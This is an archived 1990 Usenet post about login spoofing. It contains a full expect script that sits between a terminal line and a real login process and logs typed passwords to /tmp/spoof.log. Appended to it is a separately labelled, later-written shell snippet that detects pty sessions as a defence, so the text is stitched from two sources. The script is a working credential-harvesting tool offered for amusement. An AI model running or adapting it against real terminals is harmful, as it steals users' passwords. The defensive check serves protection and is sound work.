Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!sdd.hp.com!wuarchive!decwrl!uunet!cme!libes
From: libes@cme.nist.gov (Don Libes)
Newsgroups: comp.unix.internals
Subject: Re: Finding Passwords
Keywords: dont try this
Message-ID: <7089@muffin.cme.nist.gov>
Date: 9 Oct 90 00:16:28 GMT
References: <8685@mirsa.inria.fr> <651@puck.mrcu> <52347@brunix.UUCP> <162@cutmcvax.OZ>
Reply-To: libes@cme.nist.gov (Don Libes)
Organization: National Institute of Standards and Technology
Lines: 43

In article <162@cutmcvax.OZ> wemmp@cutmcvax.oz.au (Peter Wemm) writes:
> What if the spoofer opens a tty/pty that just transfers characters
> between master/slave and the process catches all data passing through
> containing the lines 'login:' or 'password'. I think it can. That
> way it could run a fake getty/REAL login or perhaps even both of the
> real programs!! It would be undetectable except that if the user typed
> 'tty' they would be on ttyp? instead of the normal line. Again, this
> requires physical access to the terminal or line. Just a thought.......

Here's a short expect script to do exactly this. Just thought you'd be
amused. It connects the input and output of 'login' to a tty. Whenever
it sees the strings "password" or "login" come from the login process,
it begins recording everything up to the next output from the login
process.

    set log /tmp/spoof.log

    spawn tip /dev/ttya         ;# open a connection to tty to be spoofed
    set tty $spawn_id
    expect *connected*          ;# throw away tip's "connected" msg

    spawn login                 ;# open a connection to a login process
    set login $spawn_id

    for {} 1 {} {
        set ready [select $tty $login]
        for {set i 0} {$i < [length $ready]} {set i [expr $i+1]} {
            set spawn_id [index $ready $i]
            if {$spawn_id == $login} {
                expect {*password* *login*} {log_file $log} \
                    eof {close $tty; exit} \
                    * {log_file}
                set spawn_id $tty
            }
            if {$spawn_id == $tty} {
                expect eof {close $login; exit} \
                    *
                set spawn_id $login
            }
            send $expect_match
        }
    }
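The one tell the thread itself points out is that a relayed session sits on a pseudo-terminal (ttyp?) rather than the hard-wired line the user sat down at. The following POSIX shell snippet is an added example, not part of the original post or of expect, that turns that observation into a check a user or a login-time profile script can run: it classifies the device name reported by tty(1) and warns when a serial line was expected but a pty is what the session is actually on. The device naming patterns (BSD ttyp0..ttyzf and pty*, SysV/Linux /dev/pts/N, hard-wired /dev/ttya, /dev/ttyS0, /dev/console) are assumptions about typical systems, not something the post specifies.

```sh
#!/bin/sh
# Added example (not from the original post): classify a terminal device
# name as a pseudo-terminal or a hard-wired line, implementing the
# "type tty and look at the answer" check mentioned in the thread.
# Device naming conventions below are assumptions:
#   BSD-style ptys:    /dev/ttyp0 .. /dev/ttyzf, /dev/pty*
#   SysV/Linux ptys:   /dev/pts/N
#   hard-wired lines:  /dev/ttya .. /dev/ttyh, /dev/ttyS0.., /dev/ttyd*, /dev/console
classify_tty() {
    case "$1" in
        /dev/pts/*|/dev/tty[p-z]?|/dev/pty*)                       echo pty ;;
        /dev/tty[a-h]|/dev/ttyS[0-9]*|/dev/ttyd*|/dev/console)     echo hardwired ;;
        *)                                                         echo unknown ;;
    esac
}

# Compare the line the session reports against the line the user expects.
# Returns 0 when they agree, 1 when they differ (for example, a pty where a
# serial line was expected, which is the symptom described in the thread).
check_expected_line() {
    expected="$1"   # e.g. /dev/ttya, the physical line the user sat down at
    actual="$2"     # normally the output of `tty`
    if [ "$actual" = "$expected" ]; then
        echo "ok: session is on $actual ($(classify_tty "$actual"))"
        return 0
    fi
    echo "WARNING: expected $expected but session is on $actual ($(classify_tty "$actual"))"
    return 1
}

# Usage in a live session (assumes tty(1) is available):
#   check_expected_line /dev/ttya "$(tty)"
```

The check is only as good as the user's knowledge of which line they are supposed to be on; a warning from it is a reason to hang up and report the terminal rather than to type a password.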